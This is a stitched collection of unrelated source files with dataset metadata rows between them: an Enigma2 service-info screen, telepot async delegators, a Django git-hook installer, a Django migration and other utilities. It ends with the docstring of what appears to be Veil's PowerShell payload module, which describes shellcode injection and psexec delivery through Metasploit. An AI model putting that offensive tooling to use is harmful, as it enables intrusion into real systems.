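# a spacer, the label text and the value, with numeric values rendered as hex,
# decimal or both according to valueType and the field width given by param.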
class ServiceInfoList(HTMLComponent, GUIComponent):
def __init__(self, source):
GUIComponent.__init__(self)
self.l = eListboxPythonMultiContent()
self.list = source
self.l.setList(self.list)
self.l.setFont(0, gFont("Regular", 23))
self.l.setItemHeight(25)
GUI_WIDGET = eListbox
def postWidgetCreate(self, instance):
self.instance.setContent(self.l)
TYPE_SERVICE_INFO = 1
TYPE_TRANSPONDER_INFO = 2
class ServiceInfo(Screen):
def __init__(self, session, serviceref=None):
Screen.__init__(self, session)
self["actions"] = ActionMap(["OkCancelActions", "ColorActions"],
{
"ok": self.close,
"cancel": self.close,
"red": self.information,
"green": self.pids,
"yellow": self.transponder,
"blue": self.tuner
}, -1)
if serviceref:
self.type = TYPE_TRANSPONDER_INFO
self["red"] = Label()
self["green"] = Label()
self["yellow"] = Label()
self["blue"] = Label()
info = eServiceCenter.getInstance().info(serviceref)
self.transponder_info = info.getInfoObject(serviceref, iServiceInformation.sTransponderData)
# info is a iStaticServiceInformation, not a iServiceInformation
self.info = None
self.feinfo = None
else:
self.type = TYPE_SERVICE_INFO
self["red"] = Label(_("Service"))
self["green"] = Label(_("PIDs"))
self["yellow"] = Label(_("Multiplex"))
self["blue"] = Label(_("Tuner status"))
service = session.nav.getCurrentService()
if service is not None:
self.info = service.info()
self.feinfo = service.frontendInfo()
print self.info.getInfoObject(iServiceInformation.sCAIDs);
else:
self.info = None
self.feinfo = None
tlist = [ ]
self["infolist"] = ServiceInfoList(tlist)
self.onShown.append(self.information)
def information(self):
if self.type == TYPE_SERVICE_INFO:
if self.session.nav.getCurrentlyPlayingServiceReference():
name = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getServiceName()
refstr = self.session.nav.getCurrentlyPlayingServiceReference().toString()
else:
name = _("N/A")
refstr = _("N/A")
aspect = self.getServiceInfoValue(iServiceInformation.sAspect)
if aspect in ( 1, 2, 5, 6, 9, 0xA, 0xD, 0xE ):
aspect = _("4:3")
else:
aspect = _("16:9")
width = self.info and self.info.getInfo(iServiceInformation.sVideoWidth) or -1
height = self.info and self.info.getInfo(iServiceInformation.sVideoHeight) or -1
if width != -1 and height != -1:
Labels = ( (_("Name"), name, TYPE_TEXT),
(_("Provider"), self.getServiceInfoValue(iServiceInformation.sProvider), TYPE_TEXT),
(_("Aspect ratio"), aspect, TYPE_TEXT),
(_("Resolution"), "%dx%d" %(width, height), TYPE_TEXT),
(_("Namespace"), self.getServiceInfoValue(iServiceInformation.sNamespace), TYPE_VALUE_HEX, 8),
(_("Service reference"), refstr, TYPE_TEXT))
else:
Labels = ( (_("Name"), name, TYPE_TEXT),
(_("Provider"), self.getServiceInfoValue(iServiceInformation.sProvider), TYPE_TEXT),
(_("Aspect ratio"), aspect, TYPE_TEXT),
(_("Namespace"), self.getServiceInfoValue(iServiceInformation.sNamespace), TYPE_VALUE_HEX, 8),
(_("Service reference"), refstr, TYPE_TEXT))
self.fillList(Labels)
else:
if self.transponder_info:
tp_info = ConvertToHumanReadable(self.transponder_info)
conv = { "tuner_type" : _("Type"),
"system" : _("System"),
"modulation" : _("Modulation"),
"orbital_position" : _("Orbital position"),
"frequency" : _("Frequency"),
"symbol_rate" : _("Symbol rate"),
"bandwidth" : _("Bandwidth"),
"polarization" : _("Polarization"),
"inversion" : _("Inversion"),
"pilot" : _("Pilot"),
"rolloff" : _("Roll-off"),
"fec_inner" : _("FEC"),
"code_rate_lp" : _("Code rate LP"),
"code_rate_hp" : _("Code rate HP"),
"constellation" : _("Constellation"),
"transmission_mode" : _("Transmission mode"),
"guard_interval" : _("Guard interval"),
"hierarchy_information" : _("Hierarchy info") }
Labels = [(conv[i], tp_info[i], TYPE_VALUE_DEC) for i in tp_info.keys()]
self.fillList(Labels)
def pids(self):
if self.type == TYPE_SERVICE_INFO:
Labels = ( (_("Video PID"), self.getServiceInfoValue(iServiceInformation.sVideoPID), TYPE_VALUE_HEX_DEC, 4),
(_("Audio PID"), self.getServiceInfoValue(iServiceInformation.sAudioPID), TYPE_VALUE_HEX_DEC, 4),
(_("PCR PID"), self.getServiceInfoValue(iServiceInformation.sPCRPID), TYPE_VALUE_HEX_DEC, 4),
(_("PMT PID"), self.getServiceInfoValue(iServiceInformation.sPMTPID), TYPE_VALUE_HEX_DEC, 4),
(_("TXT PID"), self.getServiceInfoValue(iServiceInformation.sTXTPID), TYPE_VALUE_HEX_DEC, 4),
(_("TSID"), self.getServiceInfoValue(iServiceInformation.sTSID), TYPE_VALUE_HEX_DEC, 4),
(_("ONID"), self.getServiceInfoValue(iServiceInformation.sONID), TYPE_VALUE_HEX_DEC, 4),
(_("SID"), self.getServiceInfoValue(iServiceInformation.sSID), TYPE_VALUE_HEX_DEC, 4))
self.fillList(Labels)
def showFrontendData(self, real):
if self.type == TYPE_SERVICE_INFO:
frontendData = self.feinfo and self.feinfo.getAll(real)
Labels = self.getFEData(frontendData)
self.fillList(Labels)
def transponder(self):
if self.type == TYPE_SERVICE_INFO:
self.showFrontendData(True)
def tuner(self):
if self.type == TYPE_SERVICE_INFO:
self.showFrontendData(False)
def getFEData(self, frontendDataOrg):
if frontendDataOrg and len(frontendDataOrg):
frontendData = ConvertToHumanReadable(frontendDataOrg)
if frontendDataOrg["tuner_type"] == "DVB-S":
return ((_("NIM"), ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H')[frontendData["tuner_number"]], TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("System"), frontendData["system"], TYPE_TEXT),
(_("Modulation"), frontendData["modulation"], TYPE_TEXT),
(_("Orbital position"), frontendData["orbital_position"], TYPE_VALUE_DEC),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Symbol rate"), frontendData["symbol_rate"], TYPE_VALUE_DEC),
(_("Polarization"), frontendData["polarization"], TYPE_TEXT),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("FEC"), frontendData["fec_inner"], TYPE_TEXT),
(_("Pilot"), frontendData.get("pilot", None), TYPE_TEXT),
(_("Roll-off"), frontendData.get("rolloff", None), TYPE_TEXT))
elif frontendDataOrg["tuner_type"] == "DVB-C":
return ((_("NIM"), ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H')[frontendData["tuner_number"]], TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("Modulation"), frontendData["modulation"], TYPE_TEXT),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Symbol rate"), frontendData["symbol_rate"], TYPE_VALUE_DEC),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("FEC"), frontendData["fec_inner"], TYPE_TEXT))
elif frontendDataOrg["tuner_type"] == "DVB-T":
data = ((_("NIM"), ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H')[frontendData["tuner_number"]], TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("System"), frontendData["system"], TYPE_TEXT),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("Bandwidth"), frontendData["bandwidth"], TYPE_VALUE_DEC),
(_("Code rate LP"), frontendData["code_rate_lp"], TYPE_TEXT),
(_("Code rate HP"), frontendData["code_rate_hp"], TYPE_TEXT),
(_("Constellation"), frontendData["constellation"], TYPE_TEXT),
(_("Transmission mode"), frontendData["transmission_mode"], TYPE_TEXT),
(_("Guard interval"), frontendData["guard_interval"], TYPE_TEXT),
(_("Hierarchy info"), frontendData["hierarchy_information"], TYPE_TEXT))
if frontendData.has_key("plp_id"):
data += ((_("PLP ID"), frontendData["plp_id"], TYPE_VALUE_DEC), )
return data
return [ ]
def fillList(self, Labels):
tlist = [ ]
for item in Labels:
if item[1] is None:
continue;
value = item[1]
if len(item) < 4:
tlist.append(ServiceInfoListEntry(item[0]+":", value, item[2]))
else:
tlist.append(ServiceInfoListEntry(item[0]+":", value, item[2], item[3]))
self["infolist"].l.setList(tlist)
def getServiceInfoValue(self, what):
if self.info is None:
return ""
v = self.info.getInfo(what)
if v == -2:
v = self.info.getInfoString(what)
elif v == -1:
v = _("N/A")
return v
|
gpl-2.0
| -2,097,492,960,710,691,000
| 38.794355
| 111
| 0.644544
| false
| 3.121126
| false
| false
| false
|
mpunkenhofer/irc-telegram-bot
|
telepot/telepot/aio/delegate.py
|
1
|
3780
|
"""
Like :mod:`telepot.delegate`, this module has a bunch of seeder factories
and delegator factories.
.. autofunction:: per_chat_id
.. autofunction:: per_chat_id_in
.. autofunction:: per_chat_id_except
.. autofunction:: per_from_id
.. autofunction:: per_from_id_in
.. autofunction:: per_from_id_except
.. autofunction:: per_inline_from_id
.. autofunction:: per_inline_from_id_in
.. autofunction:: per_inline_from_id_except
.. autofunction:: per_application
.. autofunction:: per_message
.. autofunction:: per_event_source_id
.. autofunction:: per_callback_query_chat_id
.. autofunction:: per_callback_query_origin
.. autofunction:: until
.. autofunction:: chain
.. autofunction:: pair
.. autofunction:: pave_event_space
.. autofunction:: include_callback_query_chat_id
.. autofunction:: intercept_callback_query_origin
"""
import asyncio
import traceback
from .. import exception
from . import helper
# Mirror traditional version to avoid having to import one more module
from ..delegate import (
per_chat_id, per_chat_id_in, per_chat_id_except,
per_from_id, per_from_id_in, per_from_id_except,
per_inline_from_id, per_inline_from_id_in, per_inline_from_id_except,
per_application, per_message, per_event_source_id,
per_callback_query_chat_id, per_callback_query_origin,
until, chain, pair, pave_event_space,
include_callback_query_chat_id, intercept_callback_query_origin
)
def _ensure_coroutine_function(fn):
return fn if asyncio.iscoroutinefunction(fn) else asyncio.coroutine(fn)
def call(corofunc, *args, **kwargs):
"""
:return:
a delegator function that returns a coroutine object by calling
``corofunc(seed_tuple, *args, **kwargs)``.
"""
corofunc = _ensure_coroutine_function(corofunc)
def f(seed_tuple):
return corofunc(seed_tuple, *args, **kwargs)
return f
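# Editorial sketch (hypothetical names, not part of the original module): a
# delegator built as call(my_handler, db) is later invoked with only the seed
# tuple and returns the coroutine object my_handler(seed_tuple, db), so any
# extra positional/keyword arguments are simply frozen into this closure.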
def create_run(cls, *args, **kwargs):
"""
:return:
a delegator function that calls the ``cls`` constructor whose arguments being
a seed tuple followed by supplied ``*args`` and ``**kwargs``, then returns
a coroutine object by calling the object's ``run`` method, which should be
a coroutine function.
"""
def f(seed_tuple):
j = cls(seed_tuple, *args, **kwargs)
return _ensure_coroutine_function(j.run)()
return f
def create_open(cls, *args, **kwargs):
"""
:return:
a delegator function that calls the ``cls`` constructor whose arguments being
a seed tuple followed by supplied ``*args`` and ``**kwargs``, then returns
a looping coroutine object that uses the object's ``listener`` to wait for
messages and invokes instance method ``open``, ``on_message``, and ``on_close``
accordingly.
"""
def f(seed_tuple):
j = cls(seed_tuple, *args, **kwargs)
async def wait_loop():
bot, msg, seed = seed_tuple
try:
handled = await helper._yell(j.open, msg, seed)
if not handled:
await helper._yell(j.on_message, msg)
while 1:
msg = await j.listener.wait()
await helper._yell(j.on_message, msg)
# These exceptions are "normal" exits.
except (exception.IdleTerminate, exception.StopListening) as e:
await helper._yell(j.on_close, e)
# Any other exceptions are accidents. **Print it out.**
# This is to prevent swallowing exceptions in the case that on_close()
# gets overridden but fails to account for unexpected exceptions.
except Exception as e:
traceback.print_exc()
await helper._yell(j.on_close, e)
return wait_loop()
return f
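# Editorial usage sketch, assuming the usual telepot DelegatorBot wiring; the
# handler class and timeout below are illustrative, not defined in this module:
#
#   bot = telepot.aio.DelegatorBot(TOKEN, [
#       pave_event_space()(per_chat_id(), create_open, MyChatHandler, timeout=10),
#   ])
#
# Each chat id then gets its own MyChatHandler whose open/on_message/on_close
# methods are driven by the wait_loop() coroutine defined above.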
|
mit
| -7,109,834,925,645,704,000
| 35
| 87
| 0.643915
| false
| 3.757455
| false
| false
| false
|
rentlytics/django-zerodowntime
|
zerodowntime/management/commands/install_git_hooks.py
|
1
|
1517
|
import os
import stat
from django.core.management import BaseCommand
COMMIT_MSG_HOOK = """
# BEGIN ZERODOWNTIME_COMMIT_MSG_HOOK
commit_regex='(\[allow\-unsafe\-migrations]|merge)'
if ! grep -iqE "$commit_regex" "$1"; then
source ./venv/bin/activate
./manage.py check_migrations
migration_check=$?
if [ $migration_check != 0 ]; then
echo "Aborting commit, caused by migrations incompatible with ZDCD." >&2
echo "To skip this check you can add '[allow-unsafe-migrations]' to your commit message." >&2
exit $migration_check
fi;
fi;
# END ZERODOWNTIME_COMMIT_MSG_HOOK
"""
class Command(BaseCommand):
help = 'Installs a git commit-msg hook which will ' \
'execute `./manage.py check_migrations` unless ' \
'the commit message contains "[allow-unsafe-migrations]"'
HOOK_PATH = '.git/hooks/'
def handle(self, *args, **options):
commit_msg_path = os.path.join(self.HOOK_PATH, 'commit-msg')
hook_exists = os.path.exists(commit_msg_path)
if hook_exists:
with open(commit_msg_path, 'r') as fp:
hook_content = fp.read()
else:
hook_content = '#!/usr/bin/env bash\n\n'
if 'ZERODOWNTIME_COMMIT_MSG_HOOK' not in hook_content:
hook_content += COMMIT_MSG_HOOK
with open(commit_msg_path, 'w') as fp:
fp.write(hook_content)
st = os.stat(commit_msg_path)
os.chmod(commit_msg_path, st.st_mode | stat.S_IEXEC)
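# Editorial usage sketch (assumed invocation, not part of the original command):
#   ./manage.py install_git_hooks
# Run from the repository root so that .git/hooks/commit-msg exists or can be
# created; the ZERODOWNTIME_COMMIT_MSG_HOOK sentinel keeps repeated runs from
# appending the hook twice.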
|
isc
| -4,212,104,457,324,079,600
| 28.745098
| 99
| 0.616348
| false
| 3.503464
| false
| false
| false
|
lishubing/zhihu-py3
|
zhihu/topic.py
|
1
|
3749
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = '7sDream'
from .common import *
class Topic:
"""答案类,请使用``ZhihuClient.topic``方法构造对象."""
@class_common_init(re_topic_url)
def __init__(self, url, name=None, session=None):
"""创建话题类实例.
:param url: 话题url
:param name: 话题名称,可选
:return: Topic
"""
self.url = url
self._session = session
self._name = name
def _make_soup(self):
if self.soup is None:
self.soup = BeautifulSoup(self._session.get(self.url).content)
@property
@check_soup('_name')
def name(self):
"""获取话题名称.
:return: 话题名称
:rtype: str
"""
return self.soup.find('h1').text
@property
@check_soup('_follower_num')
def follower_num(self):
"""获取话题关注人数.
:return: 关注人数
:rtype: int
"""
follower_num_block = self.soup.find(
'div', class_='zm-topic-side-followers-info')
        # When nobody follows the topic the corresponding block is missing, so return 0 (thanks to Zhihu user 段晓晨 for reporting this)
if follower_num_block.strong is None:
return 0
return int(follower_num_block.strong.text)
@property
@check_soup('_photo_url')
def photo_url(self):
"""获取话题头像图片地址.
:return: 话题头像url
:rtype: str
"""
if self.soup is not None:
img = self.soup.find('a', id='zh-avartar-edit-form').img['src']
return img.replace('_m', '_r')
@property
@check_soup('_description')
def description(self):
"""获取话题描述信息.
:return: 话题描述信息
:rtype: str
"""
if self.soup is not None:
desc = self.soup.find('div', class_='zm-editable-content').text
return desc
@property
@check_soup('_top_answers')
def top_answers(self):
"""获取话题下的精华答案.
:return: 话题下的精华答案,返回生成器.
:rtype: Answer.Iterable
"""
from .question import Question
from .answer import Answer
from .author import Author
if self.url is None:
return
for page_index in range(1, 50):
html = self._session.get(
self.url + 'top-answers?page=' + str(page_index)).text
soup = BeautifulSoup(html)
            if soup.find('div', class_='error') is not None:
return
questions = soup.find_all('a', class_='question_link')
answers = soup.find_all(
'a', class_=re.compile(r'answer-date-link.*'))
authors = soup.find_all('h3', class_='zm-item-answer-author-wrap')
upvotes = soup.find_all('a', class_='zm-item-vote-count')
for ans, up, q, au in zip(answers, upvotes, questions, authors):
answer_url = Zhihu_URL + ans['href']
question_url = Zhihu_URL + q['href']
question_title = q.text
upvote = int(up['data-votecount'])
question = Question(question_url, question_title,
session=self._session)
if au.text == '匿名用户':
author = Author(None, name='匿名用户', session=self._session)
else:
author_url = Zhihu_URL + au.a['href']
author = Author(author_url, session=self._session)
yield Answer(answer_url, question, author, upvote,
session=self._session)
|
mit
| 1,154,990,247,466,391,800
| 28.615385
| 78
| 0.516883
| false
| 3.158614
| false
| false
| false
|
gems-uff/noworkflow
|
capture/noworkflow/now/ipython/__init__.py
|
1
|
1194
|
# Copyright (c) 2016 Universidade Federal Fluminense (UFF)
# Copyright (c) 2016 Polytechnic Institute of New York University.
# This file is part of noWorkflow.
# Please, consult the license terms in the LICENSE file.
"""IPython Module"""
from __future__ import (absolute_import, print_function,
division)
from ..persistence.models import * # pylint: disable=wildcard-import
from ..persistence import persistence_config, relational, content
def init(path=None, ipython=None):
"""Initiate noWorkflow extension.
Load D3, IPython magics, and connect to database
Keyword Arguments:
path -- database path (default=current directory)
ipython -- IPython object (default=None)
"""
import os
from .magics import register_magics
try:
from .hierarchymagic import load_ipython_extension as load_hierarchy
load_hierarchy(ipython)
except ImportError:
print("Warning: Sphinx is not installed. Dot "
"graphs won't work")
register_magics(ipython)
if path is None:
path = os.getcwd()
persistence_config.connect(path)
return u"ok"
|
mit
| -3,581,050,087,282,086,000
| 29.615385
| 114
| 0.659966
| false
| 4.234043
| false
| false
| false
|
bartekbp/intelidzentaj
|
choregraphe-dir/personRecognizerProxy.py
|
1
|
2453
|
import httplib
import random
import string
import sys
import mimetypes
import urllib2
import httplib
import time
import re
def random_string(length):
return ''.join(random.choice(string.letters) for ii in range(length + 1))
def encode_multipart_data(data, files, binary):
boundary = random_string(30)
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
def encode_field(field_name):
return ('--' + boundary,
'Content-Disposition: form-data; name="%s"' % field_name,
'', str(data[field_name]))
def encode_file(field_name):
filename = files[field_name]
return ('--' + boundary,
'Content-Disposition: form-data; name="%s"; filename="%s"' % (field_name, filename),
'Content-Type: %s' % get_content_type(filename),
'', open(filename, 'rb').read())
def encode_binary(field_name):
return ('--' + boundary,
'Content-Disposition: form-data; name="%s"; filename="%s"' % (field_name, field_name),
'Content-Type: image/jpeg',
'', binary[field_name])
lines = []
for name in data:
lines.extend(encode_field(name))
for name in files:
lines.extend(encode_file(name))
for name in binary:
lines.extend(encode_binary(name))
lines.extend(('--%s--' % boundary, ''))
body = '\r\n'.join(lines)
headers = {'content-type': 'multipart/form-data; boundary=' + boundary,
'content-length': str(len(body))}
return body, headers
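# Editorial sketch (placeholder field names and data, not from the original file):
#   body, headers = encode_multipart_data({'user': 'nao'}, {}, {'img': jpeg_bytes})
# produces a multipart/form-data payload whose 'img' part carries the raw JPEG
# bytes; send_post() below hands exactly this (body, headers) pair to
# HTTPConnection.request().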
def send_post(url, data, files, binary):
req = urllib2.Request(url)
connection = httplib.HTTPConnection(req.get_host())
connection.request('POST', req.get_selector(),
*encode_multipart_data(data, files, binary))
response = connection.getresponse()
if response.status != 200:
return "bad response code"
return response.read()
class PersonRecognizerProxy(object):
def __init__(self, address):
self.address = address
def recognize_person(self, image):
return send_post(self.address, {}, {}, {"img":image})
"""
import personRecognizerProxy
personRec = personRecognizerProxy.PersonRecognizerProxy("")
"""
|
mit
| -1,507,222,798,856,588,800
| 29.050633
| 102
| 0.576845
| false
| 3.995114
| false
| false
| false
|
google/dl_bounds
|
dl_bounds/src/experiments/exp_sharpness.py
|
1
|
3102
|
# coding=utf-8
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements experimental logic."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from dl_bounds.src.data import LocalDatasetProvider
from dl_bounds.src.experiments.exp_base import Experiment
import numpy as np
import tensorflow as tf
class SharpnessExperiment(Experiment):
"""Computes sharpness complexity measure.
Sharpness described in:
N. S. Keskar, D. Mudigere, J. Nocedal, M. Smelyanskiy,
and P. T. P. Tang. On large-batch training
for deep learning: Generalization gap and sharp minima.
In ICLR 2017.
"""
def run(self):
"""Runs experiment."""
if self.exists():
tf.logging.info("Result file already exists.")
return
(x_train, y_train, x_val, y_val, _) = self.get_data()
m = x_train.shape[0]
tf.logging.info("Training set size = %d", m)
tf.logging.info("Val set size = %d", x_val.shape[0])
train_dataset = LocalDatasetProvider(
x_train, y_train, shuffle_seed=self.conf.data_shuffle_seed)
val_dataset = LocalDatasetProvider(
x_val, y_val, shuffle_seed=self.conf.data_shuffle_seed)
sharpness_dataset = LocalDatasetProvider(
x_train, y_train, shuffle_seed=self.conf.data_shuffle_seed)
n_records = self.get_n_records()
# Constants as in the paper describing sharpness measure
alpha_range = [5e-4, 1e-3, 1e-2]
n_alpha = len(alpha_range)
sharpness = np.zeros((n_records, n_alpha))
tf.logging.info("Computing sharpness on alpha=%s", ", ".join(
map(str, alpha_range)))
for (pass_index, (p, model)) in enumerate(self.train(train_dataset)):
self.measure_on_train_val(train_dataset, val_dataset, pass_index, p,
model)
self.report_train_val(pass_index)
for (i_alpha, alpha) in enumerate(alpha_range):
sharpness[pass_index, i_alpha] = model.sharpness(
sharpness_dataset,
batch_size=self.conf.batch_size,
learning_rate=self.conf.learning_rate,
init_stddev=self.conf.init_stddev,
passes=10,
optimizer=self.conf.optimizer,
alpha=alpha)
tf.logging.info(
"Sharpness (alpha=%s): %s", alpha,
", ".join(
["%.2f" % x for x in sharpness[:pass_index+1, i_alpha]]))
results = self.get_train_val_measurements()
results.update(dict(sharpness=sharpness, alpha=alpha_range))
self.save(results)
return results
|
apache-2.0
| -123,532,413,234,264,400
| 32.717391
| 74
| 0.661186
| false
| 3.517007
| false
| false
| false
|
ITOO-UrFU/open-programs
|
open_programs/apps/programs/migrations/0001_initial.py
|
1
|
12004
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-02 09:11
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
('competences', '__first__'),
('persons', '0001_initial'),
('modules', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ChoiceGroup',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=2048, verbose_name='Наименование группы выбора')),
('labor', models.IntegerField(default=3, verbose_name='Трудоёмкость группы')),
('number', models.IntegerField(verbose_name='Номер группы выбора')),
],
options={
'verbose_name': 'группа выбора',
'verbose_name_plural': 'группы выбора',
},
),
migrations.CreateModel(
name='ChoiceGroupType',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=2048, verbose_name='Наименование типы группы выбора')),
],
options={
'verbose_name': 'тип группы выбора',
'verbose_name_plural': 'типы группы выбора',
},
),
migrations.CreateModel(
name='LearningPlan',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('uni_displayableTitle', models.CharField(blank=True, max_length=32, null=True, verbose_name='Версия')),
('uni_number', models.CharField(blank=True, max_length=32, null=True, verbose_name='Номер УП')),
('uni_active', models.CharField(blank=True, max_length=32, null=True, verbose_name='Текущая версия')),
('uni_title', models.CharField(blank=True, max_length=32, null=True, verbose_name='Название')),
('uni_stage', models.BooleanField(default=True, verbose_name='План утверждён')),
('uni_loadTimeType', models.CharField(blank=True, max_length=32, null=True, verbose_name='Единица измерения нагрузки')),
('uni_html', models.TextField(blank=True, null=True)),
],
options={
'verbose_name': 'учебный план',
'verbose_name_plural': 'учебные планы',
},
),
migrations.CreateModel(
name='Program',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('level', models.CharField(choices=[('b', 'бакалавриат'), ('m', 'магистратура'), ('s', 'специалитет')], default='b', max_length=1, verbose_name='Уровень программы')),
('title', models.CharField(default='', max_length=256, verbose_name='Наименование образовательной программы')),
('training_direction', models.CharField(default='', max_length=256, verbose_name='Направление подготовки')),
('chief', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='persons.Person', verbose_name='Руководитель образовательной программы')),
('competences', models.ManyToManyField(blank=True, to='competences.Competence')),
('learning_plans', models.ManyToManyField(blank=True, to='programs.LearningPlan')),
],
options={
'verbose_name': 'программа',
'verbose_name_plural': 'программы',
},
),
migrations.CreateModel(
name='ProgramCompetence',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=2048, verbose_name='Наименование компетенции')),
('number', models.IntegerField(verbose_name='Номер компетенции')),
],
options={
'verbose_name': 'компетенция программы',
'verbose_name_plural': 'компетенции программы',
},
),
migrations.CreateModel(
name='ProgramModules',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('semester', models.PositiveIntegerField(blank=True, null=True)),
('choice_group', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='programs.ChoiceGroup')),
('competence', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='programs.ProgramCompetence')),
('module', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='modules.Module')),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.Program')),
],
options={
'verbose_name': 'модуль программы',
'verbose_name_plural': 'модули программы',
},
),
migrations.CreateModel(
name='TargetModules',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('choice_group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.ChoiceGroup')),
('program_module', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.ProgramModules')),
],
options={
'verbose_name': 'модуль цели',
'verbose_name_plural': 'модули цели',
},
),
migrations.CreateModel(
name='TrainingTarget',
fields=[
('archived', models.BooleanField(default=False, verbose_name='В архиве')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Обновлен')),
('status', models.CharField(choices=[('h', 'Скрыт'), ('p', 'Опубликован')], default='h', max_length=1, verbose_name='Статус публикации')),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('title', models.CharField(default='', max_length=256, verbose_name='Наименование образовательной цели')),
('number', models.IntegerField(verbose_name='Порядковый номер цели')),
('program', models.ManyToManyField(to='programs.Program')),
],
options={
'verbose_name': 'образовательная цель',
'verbose_name_plural': 'образовательные цели',
},
),
migrations.AddField(
model_name='targetmodules',
name='target',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.TrainingTarget'),
),
migrations.AddField(
model_name='choicegroup',
name='choice_group_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.ChoiceGroupType'),
),
migrations.AddField(
model_name='choicegroup',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='programs.Program'),
),
]
|
unlicense
| -2,469,500,295,048,216,000
| 60.683616
| 189
| 0.588478
| false
| 3.264952
| false
| false
| false
|
d3m3vilurr/Veil
|
modules/payloads/powershell/psPsexecVirtualAlloc.py
|
1
|
2739
|
"""
Powershell method to inject inline shellcode.
Builds a metasploit .rc resource file to psexec the powershell command easily
